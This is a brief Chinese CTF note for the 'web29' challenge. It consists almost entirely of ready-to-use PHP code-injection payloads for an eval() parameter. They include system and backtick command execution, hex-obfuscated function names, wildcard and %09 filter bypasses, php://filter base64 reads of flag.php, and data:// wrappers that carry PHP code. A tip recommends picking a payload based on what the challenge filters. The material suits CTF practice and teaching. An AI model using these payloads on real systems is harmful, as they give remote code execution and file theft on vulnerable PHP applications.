一.web29
构造payload
?c=system("tac fla?.php");
?c=echo `tac *`; //反引号效果同于system函数
?c=eval($_GET[1]);&1=system('cat flag.php');
?c="\x73\x79\x73\x74\x65\x6d"("nl%09fl[a]*"); //等价于system(),说明双引号会自动解析
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
或者POST:
?c=include$_POST[a]?>
post:a=php://filter/read=convert.base64-encode/resource=flag.php
?c=data://text/plain,<?php%20system("tac%20f*");?>
?c=data://text/plain,<?=%20system("tac%20f*");?>
?c=data://text/plain;base64, PD9waHAgaW5jbHVkZSgnZmxhZy5waHAnKTtlY2hvICRmbGFnPz4=
看题目过滤了什么而选择
一般题目中用eval(c)的都可以用这个秒杀
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
或者POST:
?c=include$_POST[a]?>